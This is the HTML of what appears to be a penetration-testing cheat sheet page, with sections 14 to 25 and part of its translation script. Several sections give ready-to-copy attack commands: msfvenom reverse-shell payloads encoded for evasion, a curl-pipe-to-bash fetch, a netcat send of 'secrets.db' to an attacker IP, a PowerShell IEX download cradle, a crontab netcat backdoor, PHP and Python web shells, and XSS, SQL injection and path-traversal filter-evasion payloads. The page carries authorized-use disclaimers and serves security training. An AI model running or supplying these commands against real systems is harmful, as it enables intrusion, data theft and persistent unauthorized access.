                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>docker run --rm -v /tmp/poc.py:/poc/poc.py --network none -it python:3.10 bash -c "python /poc/poc.py"
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section14Title" data-target="section-14">
            14) Binary Reversing & Exploit Development
            <span class="chip-container"><span class="chip">Reverse</span><span class="chip">Pwn</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section14Desc">Static analysis (ELF), ROP gadget hunting, and interactive debugging setup.</p>
        <div id="section-14" class="section-content">
            <p class="command-desc" data-i18n="section14CommandDesc">Tools used for analyzing executable file headers, assembly code, and preparing buffer overflow exploits.</p>
            
            <p class="command-desc"># ELF inspection</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>readelf -h binary
objdump -d binary | less
strings binary
</code></pre>

            <p class="command-desc">ropgadget (search for pop/ret gadgets)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>ropgadget --binary binary --only "pop|ret" > gadgets.txt
</code></pre>

            <p class="command-desc">gdb + pwndbg (start debugging session)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>gdb -q ./binary
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section15Title" data-target="section-15">
            15) Fuzzing
            <span class="chip-container"><span class="chip">Fuzzing</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section15Desc">Instrumented binary fuzzing and HTTP request fuzzing for input discovery.</p>
        <div id="section-15" class="section-content">
            <p class="command-desc" data-i18n="section15CommandDesc">AFL is used for finding crashes in C/C++ binaries; Wfuzz is used for black-box web fuzzing.</p>
            
            <p class="command-desc"># AFL (instrumented binary)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>afl-fuzz -i in_dir -o out_dir -- ./target @@
</code></pre>

            <p class="command-desc">wfuzz for HTTP (parameter discovery)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>wfuzz -c -z file,/usr/share/wordlists/parameters.txt --hc 404 "https://example.com/vuln?FUZZ=1"
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section16Title" data-target="section-16">
            16) Mobile & Firmware Analysis
            <span class="chip-container"><span class="chip">Mobile</span><span class="chip">Firmware</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section16Desc">Decompilation of APKs, dynamic runtime analysis (Frida), and firmware extraction.</p>
        <div id="section-16" class="section-content">
            <p class="command-desc" data-i18n="section16CommandDesc">Commands for static and dynamic analysis of Android apps and embedded system binaries.</p>
            
            <p class="command-desc"># android decompile / inspect (jadx)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>jadx -d out app.apk
</code></pre>

            <p class="command-desc">frida (dynamic hooks) - authorized/lab only</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>frida -U -f com.example.app -l script.js --no-pause
</code></pre>

            <p class="command-desc">firmware extraction (binwalk)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>binwalk -e firmware.bin
strings firmware.bin | grep -i password
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section17Title" data-target="section-17">
            17) Container & Kubernetes Hardening
            <span class="chip-container"><span class="chip">Docker</span><span class="chip">K8s</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section17Desc">Assessing container misconfigurations, privilege escalation within Docker, and basic K8s pod checks.</p>
        <div id="section-17" class="section-content">
            <p class="command-desc" data-i18n="section17CommandDesc">Commands for checking Docker security posture and common container escape vectors.</p>
            
            <p class="command-desc"># check docker configuration (host)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>docker info --format '{{.SecurityOptions}}'
</code></pre>

            <p class="command-desc">check for privileged containers (host)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>docker ps --filter 'privileged=true'
</code></pre>

            <p class="command-desc">k8s: list running pods in default namespace</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>kubectl get pods -n default
</code></pre>

            <p class="command-desc">k8s: exec into a pod for internal enumeration</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>kubectl exec -it pod-name -- /bin/bash
</code></pre>
        </div>
    </div>

    <div class="section-container">
        <h2 class="section-header" data-i18n="section18Title" data-target="section-18">
            18) Evasion & msfvenom Payloads
            <span class="chip-container">
                <span class="chip">Exploit</span>
                <span class="chip">Evasion</span>
                <span class="chip">MSF</span>
            </span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section18Desc">Generating and encoding reverse shell payloads. **AUTHORIZED USE ONLY.**</p>
        <div id="section-18" class="section-content">
            <p class="command-desc" data-i18n="section18CommandDesc">Use the '-e' flag for evasion (encoding) and the '-f' flag for different output formats.</p>

            <p class="command-desc"># Windows Reverse Shell (Encoded 3 times)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f exe > /root/Desktop/payload-enc.exe
</code></pre>

            <p class="command-desc">Linux Python Reverse Shell (Raw Output, useful for injection)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>msfvenom -p cmd/unix/reverse_python LHOST=10.0.0.5 LPORT=4444 -f raw
</code></pre>

            <p class="command-desc">PHP Web Shell for Upload Vulnerabilities</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f raw > shell.php
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section19Title" data-target="section-19">
            19) File Transfer (In-Memory & On-Disk)
            <span class="chip-container">
                <span class="chip">Payload</span>
                <span class="chip">Exfil</span>
            </span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section19Desc">Common methods to transfer files to and from a compromised host (Linux/Windows).</p>
        <div id="section-19" class="section-content">
            <p class="command-desc" data-i18n="section19CommandDesc">Essential techniques using native binaries (curl, wget) and common languages (Python, Netcat).</p>

            <p class="command-desc"># Attacker: Python HTTP Server (Serving files)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>python3 -m http.server 8000
</code></pre>

            <p class="command-desc">Target (Linux): Download file via curl (In-Memory execution, safer)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>curl http://10.0.0.5:8000/script.sh | bash
</code></pre>

            <p class="command-desc">Target: Netcat Transfer (Send file: 'secrets.db' to Attacker IP: 10.0.0.5)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>nc 10.0.0.5 8888 < secrets.db
</code></pre>

            <p class="command-desc">Target (Windows): Download file via PowerShell (IEX)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5:8000/shell.ps1')
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section20Title" data-target="section-20">
            20) Tunneling & Pivoting
            <span class="chip-container">
                <span class="chip">Network</span>
                <span class="chip">Pivot</span>
            </span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section20Desc">Establishing network access to otherwise unreachable internal networks from a compromised host (pivoting).</p>
        <div id="section-20" class="section-content">
            <p class="command-desc" data-i18n="section20CommandDesc">Utilizing SSH, Meterpreter, and native tools to create port forwards and SOCKS proxies.</p>
            
            <p class="command-desc"># Local SSH Port Forward (Tunnel local port to remote target)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>ssh -L 8080:192.168.1.10:80 user@jumpbox.corp
</code></pre>

            <p class="command-desc">Reverse SSH Tunnel (Target connects back to attacker to create a forward)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>ssh -R 9000:127.0.0.1:80 user@10.0.0.5
</code></pre>

            <p class="command-desc">SOCKS Proxy via Chisel (Attacker: SOCKS server)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>./chisel server -p 8000 --socks5
</code></pre>
            
            <p class="command-desc">Chisel (Target: Connect to server and create tunnel)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>./chisel client 10.0.0.5:8000 R:1080:socks
</code></pre>
        </div>
    </div>
    
    <div class="section-container">
        <h2 class="section-header" data-i18n="section21Title" data-target="section-21">
            21) Persistence & Backdoors
            <span class="chip-container">
                <span class="chip">Persistence</span>
                <span class="chip">Backdoor</span>
            </span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section21Desc">Establishing unauthorized, persistent access via cron jobs, systemd, or binary modification. **DEFENSIVE EDUCATION ONLY.**</p>
        <div id="section-21" class="section-content">
            <p class="command-desc" data-i18n="section21CommandDesc">Common techniques used by adversaries to maintain access after an initial compromise.</p>

            <p class="command-desc"># Linux: Cron job persistence (runs every minute)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>echo '* * * * * root /usr/bin/nc -e /bin/bash 10.0.0.5 4444' >> /etc/crontab
</code></pre>

            <p class="command-desc">Linux: SSH Authorized Keys (Add attacker's public key)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>echo "ssh-rsa AAAAB3Nz..." >> /home/user/.ssh/authorized_keys
</code></pre>

            <p class="command-desc">Windows: Startup Folder (copy malicious executable)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>copy payload.exe "C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
</code></pre>
        </div>
    </div>

    <div class="section-container">
        <h2 class="section-header" data-i18n="section22Title" data-target="section-22">
            22) Web Filtering Evasion (WAF/IDPS)
            <span class="chip-container">
                <span class="chip">Evasion</span>
                <span class="chip">Web</span>
            </span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section22Desc">Techniques to bypass web application firewalls (WAFs) and intrusion detection systems (IDPS) for common web vulnerabilities.</p>
        <div id="section-22" class="section-content">
            <p class="command-desc" data-i18n="section22CommandDesc">Focuses on injection payload encoding and obfuscation techniques used in vulnerability research.</p>

            <p class="command-desc"># XSS HTML Encoding Evasion</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>// Payloads using hex/HTML entity encoding
&lt;sCrIpT&gt;alert(1)&lt;/ScRiPt&gt; // Case variation
&lt;img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;"&gt; // Decimal entity encoding
</code></pre>
            
            <p class="command-desc">SQL Injection Evasion (comments & obfuscation)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>SELECT user_name FROM users WHERE id=1 /*comment*/ OR 1=1--
1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) // Time-based blind SQLi using sleep
</code></pre>
            
            <p class="command-desc">LFI/Path Traversal Evasion (double URL encoding)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>// Payload to check for filter bypass:
../../../../../../../../../../etc/passwd // Standard path
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd // URL encoded
</code></pre>
        </div>
    </div>

    <div class="section-container">
        <h2 class="section-header" data-i18n="section23Title" data-target="section-23">
            23) Privilege Escalation (Linux)
            <span class="chip-container"><span class="chip">Privesc</span><span class="chip">Linux</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section23Desc">Key commands for local Linux enumeration to discover misconfigurations that grant root access (SUDO, SUID, capabilities).</p>
        <div id="section-23" class="section-content">
            <p class="command-desc" data-i18n="section23CommandDesc">Checking common files and permissions for weakness on a compromised Linux host.</p>

            <p class="command-desc"># Check SUDO privileges (what can the current user run as root?)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>sudo -l
</code></pre>

            <p class="command-desc">Find SUID/SGID binaries (potential misuse/vulnerability)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>find / -perm -4000 2>/dev/null
</code></pre>
            
            <p class="command-desc">Check for kernel vulnerabilities (using LinPEAS is standard practice, but local check is faster)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>uname -a
</code></pre>
        </div>
    </div>

    <div class="section-container">
        <h2 class="section-header" data-i18n="section24Title" data-target="section-24">
            24) WebShell One-Liners
            <span class="chip-container"><span class="chip">Web</span><span class="chip">Shell</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section24Desc">Simple command execution payloads often used in conjunction with file upload or command injection vulnerabilities. **DEFENSIVE EDUCATION ONLY.**</p>
        <div id="section-24" class="section-content">
            <p class="command-desc" data-i18n="section24CommandDesc">Basic payloads that provide remote command execution on PHP or Python web servers.</p>

            <p class="command-desc"># PHP shell (create file shell.php)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>&lt;?php system($_GET['cmd']); ?&gt;
</code></pre>

            <p class="command-desc">Python shell (create file shell.py)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>import cgi, cgitb; cgitb.enable(); form=cgi.FieldStorage(); print("Content-type: text/html\n"); print(form.getvalue('cmd'))
</code></pre>
        </div>
    </div>

    <div class="section-container">
        <h2 class="section-header" data-i18n="section25Title" data-target="section-25">
            25) Safe PoC Testing & Logging
            <span class="chip-container"><span class="chip">Safety</span><span class="chip">Logging</span></span>
            <span class="toggle-icon" data-expanded="🔓" data-collapsed="🔒">🔒</span>
        </h2>
        <p class="section-desc" data-i18n="section25Desc">Ensuring safe, reproducible testing environments and comprehensive logging.</p>
        <div id="section-25" class="section-content">
            <p class="command-desc" data-i18n="section25CommandDesc">Techniques to minimize risk via Docker isolation and ensure detailed test outcome logging.</p>
            
            <p class="command-desc"># isolated container (no external network)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>docker run --rm --network none -v $(pwd):/work -it ubuntu:22.04 bash
</code></pre>

            <p class="command-desc">spin up target service in container (lab)</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>docker run --rm -p 8080:80 vuln-app:latest
</code></pre>

            <p class="command-desc">logging with timestamps & tool version</p>
            <pre class="command-block">
                <span class="copy-feedback" data-i18n="copyButtonText">Copy</span><code>(tool --version 2>&1 ; date; tool [args]) |& tee logfile.txt
</code></pre>
        </div>
    </div>
    
    <footer>
        <span data-i18n="footerText">Built for learning & defensive security • Use responsibly • Last update: 2025-10-24 • **Andrey Lopukhov, Individual**</span>
        <span data-i18n="githubLink"> | <a href="https://github.com/tripping-alien/HackersCheatsheet" target="_blank" style="color: var(--accent);">GitHub Repository</a></span>
    </footer>

</div>

<script>
    // --- I18N (Language Switching) DATA ---
    // NOTE: This JSON must be copied directly into the corresponding JavaScript section of your final file.
    // The provided data below is only for the JavaScript logic to work.
    const translations = {
        // Main and Global Elements
        "mainTitle": { "en": "Penetration Testing & Vulnerability Research — Robust Cheatsheet", "ru": "Чит-лист по тестированию на проникновение и исследованию уязвимостей", "he": "גיליון רמאות מקיף לבדיקות חדירה ומחקר פגיעויות", "fr": "Aide-mémoire robuste pour les tests d'intrusion et la recherche de vulnérabilités", "de": "Umfassendes Cheat Sheet für Penetrationstests und Schwachstellenforschung" },
        "warningTitle": { "en": "⚠️ AUTHORIZED USE ONLY", "ru": "⚠️ ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ИСПОЛЬЗОВАНИЯ", "he": "⚠️ שימוש מורשה בלבד", "fr": "⚠️ UTILISATION AUTORISÉE UNIQUEMENT", "de": "⚠️ NUR FÜR AUTORISIERTE NUTZUNG" },
        "warningBody": { "en": "Run these commands only in lab environments or on targets you have explicit written permission to test.", "ru": "Запускайте эти команды только в лабораторных средах или на целях, для которых у вас есть явное письменное разрешение на тестирование.", "he": "הפעל פקודות אלה רק בסביבות מעבדה או על יעדים שיש לך אישור כתוב מפורש לבדוק.", "fr": "N'exécutez ces commandes que dans des environnements de laboratoire ou sur des cibles pour lesquelles vous disposez d'une autorisation écrite explicite.", "de": "Führen Sie diese Befehle nur in Laborumgebungen oder auf Zielen aus, für die Sie eine ausdrückliche schriftliche Erlaubnis zum Testen haben." },
        "footerText": { "en": "Built for learning & defensive security • Use responsibly • Last update: 2025-10-24 • **Andrey Lopukhov, Individual**", "ru": "Создано для обучения и защитной безопасности • Используйте ответственно • Последнее обновление: 2025-10-24 • **Андрей Лопухов, Индивидуальный**", "he": "נבנה ללמידה ואבטחה הגנתית • השתמשו באחריות • עדכון אחרון: 2025-10-24 • **אנדריי לופוחוב, יחיד**", "fr": "Conçu pour l'apprentissage et la sécurité défensive • Utiliser de manière responsable • Dernière mise à jour: 2025-10-24 • **Andrey Lopukhov, Individual**", "de": "Erstellt für Lern- und Verteidigungszwecken • Verantwortungsbewusst nutzen • Letzte Aktualisierung: 2025-10-24 • **Andrey Lopukhov, Individual**" },
        "githubLink": { "en": " | <a href=\"https://github.com/tripping-alien/HackersCheatsheet\" target=\"_blank\" style=\"color: var(--accent);\">GitHub Repository</a>", "ru": " | <a href=\"https://github.com/tripping-alien/HackersCheatsheet\" target=\"_blank\" style=\"color: var(--accent);\">Репозиторий GitHub</a>", "he": " | <a href=\"https://github.com/tripping-alien/HackersCheatsheet\" target=\"_blank\" style=\"color: var(--accent);\">מאגר GitHub</a>", "fr": " | <a href=\"https://github.com/tripping-alien/HackersCheatsheet\" target=\"_blank\" style=\"color: var(--accent);\">Répertoire GitHub</a>", "de": " | <a href=\"https://github.com/tripping-alien/HackersCheatsheet\" target=\"_blank\" style=\"color: var(--accent);\">GitHub-Repository</a>" },
        "searchInputPlaceholder": { "en": "Search commands, tools, CVE...", "ru": "Поиск команд, инструментов, CVE...", "he": "חפש פקודות, כלים, CVE...", "fr": "Rechercher commandes, outils, CVE...", "de": "Suche Befehle, Tools, CVE..." },
        "toggleButtonCollapsed": { "en": "Expand All", "ru": "Развернуть все", "he": "הרחב הכל", "fr": "Tout développer", "de": "Alle erweitern" },
        "toggleButtonExpanded": { "en": "Collapse All", "ru": "Свернуть все", "he": "כווץ הכל", "fr": "Tout réduire", "de": "Alle zuklappen" },
        "copyButtonText": { "en": "Copy", "ru": "Копировать", "he": "העתק", "fr": "Copier", "de": "Kopieren" },

        // SECTION 1: Recon & OSINT
        "section1Title": {"en": "1) Recon & OSINT", "ru": "1) Разведка и OSINT", "he": "1) סיור ואיסוף מודיעין גלוי", "fr": "1) Reconnaissance et OSINT", "de": "1) Aufklärung & OSINT"},
        "section1Desc": {"en": "Footprinting, WHOIS, DNS lookups, and passive certificate data gathering.", "ru": "Сбор следов, запросы WHOIS, поиск DNS и пассивный сбор данных сертификатов.", "he": "איסוף טביעת רגל, בדיקות WHOIS, חיפושי DNS ואיסוף פסיבי של נתוני תעודות SSL.", "fr": "Empreinte, recherches WHOIS, DNS et collecte passive de données de certificat.", "de": "Footprinting, WHOIS, DNS-Abfragen und passive Zertifikatdatenerfassung."},
        "section1CommandDesc": {"en": "Commands gather domain info, DNS records, HTTP headers, and passive certificate/host data.", "ru": "Команды собирают информацию о домене, DNS-записи, заголовки HTTP и пассивные данные сертификатов/хостов.", "he": "פקודות לאיסוף פרטי דומיין, רשומות DNS, כותרות HTTP ונתוני אישור/מארח פסיביים.", "fr": "Les commandes recueillent des informations de domaine, des enregistrements DNS, des en-têtes HTTP et des données passives de certificat/hôte.", "de": "Befehle erfassen Domäneninformationen, DNS-Einträge, HTTP-Header und passive Zertifikats-/Hostdaten."},

        // SECTION 2: Recon: Search Engine Dorking & Exposed Assets
        "section2Title": { "en": "2) Recon: Search Engine Dorking & Exposed Assets", "ru": "2) Разведка: Доркинг поисковых систем и открытые активы", "he": "2) סיור: דורקינג מנועי חיפוש ונכסים חשופים", "fr": "2) Dorking et Actifs Exposés", "de": "2) Suchmaschinen-Dorking & Exposed Assets" },
        "section2Desc": { "en": "Using advanced search operators (Dorks) on Google, Bing, and Yandex to discover exposed files, directories, and misconfigurations.", "ru": "Использование расширенных операторов поиска (Дорков) для обнаружения открытых файлов, каталогов и неверных конфигураций.", "he": "שימוש באופרטורי חיפוש מתקדמים (דורקים) לגילוי קבצים, ספריות ותצורות שגויות שנחשפו.", "fr": "Utilisation d'opérateurs de recherche avancés (Dorks) pour découvrir des fichiers, répertoires et erreurs de configuration exposés.", "de": "Verwendung erweiterter Suchoperatoren (Dorks) zur Entdeckung exponierter Dateien, Verzeichnisse und Fehlkonfigurationen." },
        "section2CommandDesc": { "en": "These dorks work across all major search engines and are crucial for external reconnaissance.", "ru": "Эти дорки работают во всех основных поисковых системах и критически важны для внешней разведки.", "he": "דורקים אלו עובדים בכל מנועי החיפוש העיקריים והם חיוניים לסיור חיצוני.", "fr": "Ces dorks fonctionnent sur tous les principaux moteurs de recherche et sont cruciaux pour la reconnaissance externe.", "de": "Diese Dorks funktionieren auf allen gängigen Suchmaschinen und sind entscheidend für die externe Aufklärung." },

        // SECTION 3: Cloud & Infrastructure Recon (AWS/Azure)
        "section3Title": { "en": "3) Cloud & Infrastructure Recon (AWS/Azure)", "ru": "3) Разведка облака и инфраструктуры (AWS/Azure)", "he": "3) סיור ענן ותשתית (AWS/Azure)", "fr": "3) Reconnaissance Cloud et Infrastructure (AWS/Azure)", "de": "3) Cloud- & Infrastruktur-Aufklärung (AWS/Azure)" },
        "section3Desc": { "en": "Searching for exposed cloud assets, S3 buckets, Azure blob storage, and DNS configuration flaws.", "ru": "Поиск открытых облачных активов, S3-корзин, хранилища Azure blob и недостатков конфигурации DNS.", "he": "חיפוש נכסי ענן חשופים, S3 דליים, אחסון Azure blob ופגמי תצורת DNS.", "fr": "Recherche d'actifs cloud exposés, de buckets S3, de stockage Azure blob et d'erreurs de configuration DNS.", "de": "Suche nach exponierten Cloud-Assets, S3-Buckets, Azure Blob Storage und DNS-Konfigurationsfehlern." },
        "section3CommandDesc": { "en": "Checking common cloud storage misconfigurations and DNS records pointing to cloud services.", "ru": "Проверка распространенных ошибок конфигурации облачного хранилища и DNS-записей, указывающих на облачные службы.", "he": "בדיקת תצורות שגויות נפוצות של אחסון ענן ורשומות DNS המצביעות על שירותי ענן.", "fr": "Vérification des erreurs de configuration courantes du stockage cloud et des enregistrements DNS pointant vers des services cloud.", "de": "Überprüfung gängiger Fehlkonfigurationen von Cloud-Speichern und DNS-Einträgen, die auf Cloud-Dienste verweisen." },

        // SECTION 4: Subdomain & DNS Enumeration
        "section4Title": { "en": "4) Subdomain & DNS Enumeration", "ru": "4) Перечисление субдоменов и DNS", "he": "4) אינומרציית דומיינים ו-DNS", "fr": "4) Énumération de sous-domaines et DNS", "de": "4) Subdomain- & DNS-Aufzählung" },
        "section4Desc": { "en": "Discovering subdomains and advanced DNS records using specialized tools.", "ru": "Обнаружение субдоменов и расширенных DNS-записей с помощью специализированных инструментов.", "he": "גילוי תתי-דומיינים ורשומות DNS מתקדמות באמצעות כלים מיוחדים.", "fr": "Découverte de sous-domaines et d'enregistrements DNS avancés à l'aide d'outils spécialisés.", "de": "Entdeckung von Subdomains und erweiterten DNS-Einträgen mittels spezialisierter Tools." },
        "section4CommandDesc": { "en": "Uses Amass and Subfinder for comprehensive target scope, combining passive and active sources.", "ru": "Использует Amass и Subfinder для комплексной области целей, объединяя пассивные и активные источники.", "he": "משתמש ב-Amass וב-Subfinder לכיסוי יעד מקיף, המשלב מקורות פסיביים ואקטיביים.", "fr": "Utilise Amass et Subfinder pour une portée cible complète, combinant des sources passives et actives.", "de": "Verwendet Amass und Subfinder für einen umfassenden Zielbereich, der passive und aktive Quellen kombiniert." },

        // SECTION 5: Network & Directory Services (SMB/AD)
        "section5Title": { "en": "5) Network & Directory Services (SMB/AD)", "ru": "5) Сетевые и каталоговые службы (SMB/AD)", "he": "5) שירותי רשת וספריות (SMB/AD)", "fr": "5) Services Réseau et Annuaires (SMB/AD)", "de": "5) Netzwerk- & Verzeichnisdienste (SMB/AD)" },
        "section5Desc": { "en": "Aggressive port scanning, service versioning, and initial enumeration of domain services (SMB, LDAP).", "ru": "Агрессивное сканирование портов, определение версий служб и начальное перечисление доменных служб (SMB, LDAP).", "he": "סריקת פורטים אגרסיבית, גרסאות שירות ואינומרציה ראשונית של שירותי דומיין (SMB, LDAP).", "fr": "Scan de ports agressif, versionnage de services et énumération initiale des services de domaine (SMB, LDAP).", "de": "Aggressives Port-Scanning, Service-Versionierung und anfängliche Aufzählung von Domänendiensten (SMB, LDAP)."},
        "section5CommandDesc": { "en": "The Nmap command is a safe, thorough pattern; specific checks for Active Directory/Windows services are included.", "ru": "Команда Nmap - безопасный, тщательный шаблон; включены конкретные проверки служб Active Directory/Windows.", "he": "פקודת Nmap היא דפוס בטוח ומקיף; בדיקות ספציפיות לשירותי Active Directory/Windows כלולות.", "fr": "La commande Nmap est un modèle sûr et complet ; des vérifications spécifiques pour les services Active Directory/Windows sont incluses.", "de": "Der Nmap-Befehl ist ein sicheres, gründliches Muster; spezifische Prüfungen für Active Directory/Windows-Dienste sind enthalten." },

        // SECTION 6: Web Discovery & Fuzzing (APIs/Content)
        "section6Title": { "en": "6) Web Discovery & Fuzzing (APIs/Content)", "ru": "6) Веб-обнаружение и фаззинг (API/Контент)", "he": "6) גילוי ופאזינג של ווב (APIs/תוכן)", "fr": "6) Découverte Web & Fuzzing (APIs/Contenu)", "de": "6) Web-Entdeckung & Fuzzing (APIs/Inhalte)" },
        "section6Desc": { "en": "Bruteforcing directories, files, virtual hosts, and API endpoints for hidden functionality.", "ru": "Перебор каталогов, файлов, виртуальных хостов и конечных точек API для скрытой функциональности.", "he": "כוח גס (Bruteforcing) על ספריות, קבצים, מארחים וירטואליים ונקודות קצה API עבור פונקציונליות נסתרת.", "fr": "Bruteforcing de répertoires, fichiers, hôtes virtuels et points de terminaison API pour une fonctionnalité cachée.", "de": "Bruteforcing von Verzeichnissen, Dateien, virtuellen Hosts und API-Endpunkten für versteckte Funktionalität." },
        "section6CommandDesc": { "en": "Uses ffuf and gobuster for content discovery, including API endpoint discovery patterns.", "ru": "Использует ffuf и gobuster для обнаружения контента, включая шаблоны обнаружения конечных точек API.", "he": "משתמש ב-ffuf וב-gobuster לגילוי תוכן, כולל תבניות גילוי נקודות קצה API.", "fr": "Utilise ffuf et gobuster pour la découverte de contenu, y compris les modèles de découverte de points de terminaison API.", "de": "Verwendet ffuf und gobuster für die Content-Erkennung, einschließlich API-Endpunkt-Erkennungsmuster." },

        // SECTION 7: Web Application & API Security Testing
        "section7Title": { "en": "7) Web Application & API Security Testing", "ru": "7) Тестирование безопасности веб-приложений и API", "he": "7) בדיקות אבטחה ליישומי ווב ו-API", "fr": "7) Test de Sécurité Applications Web et API", "de": "7) Webanwendungs- & API-Sicherheitstests" },
        "section7Desc": { "en": "Quick vulnerability checks for SQLi, XSS, SSRF, and API parameter enumeration.", "ru": "Быстрые проверки уязвимостей SQLi, XSS, SSRF и перечисление параметров API.", "he": "בדיקות פגיעות מהירות עבור SQLi, XSS, SSRF ואינומרציית פרמטרי API.", "fr": "Vérifications rapides des vulnérabilités SQLi, XSS, SSRF et énumération des paramètres API.", "de": "Schnelle Schwachstellenprüfungen für SQLi, XSS, SSRF und API-Parameter-Aufzählung." },
        "section7CommandDesc": { "en": "Tools for checking common OWASP Top 10 flaws and API layer diagnostics. **Lab use only.**", "ru": "Инструменты для проверки общих недостатков OWASP Top 10 и диагностики уровня API. **Только для лаборатории.**", "he": "כלים לבדיקת פגמים נפוצים של OWASP Top 10 ואבחון שכבת API. **לשימוש מעבדתי בלבד.**", "fr": "Outils pour vérifier les défauts courants d'OWASP Top 10 et le diagnostic de la couche API. **Utilisation en laboratoire uniquement.**", "de": "Tools zur Überprüfung gängiger OWASP Top 10-Mängel und API-Layer-Diagnose. **Nur für Laborzwecke.**" },

        // SECTION 8: Vulnerability Scanning & SCA (Open Source)
        "section8Title": { "en": "8) Vulnerability Scanning & SCA (Open Source)", "ru": "8) Сканирование уязвимостей и SCA (Open Source)", "he": "8) סריקת פגיעויות ו-SCA (קוד פתוח)", "fr": "8) Scan de Vulnérabilités & SCA (Open Source)", "de": "8) Schwachstellenscan & SCA (Open Source)" },
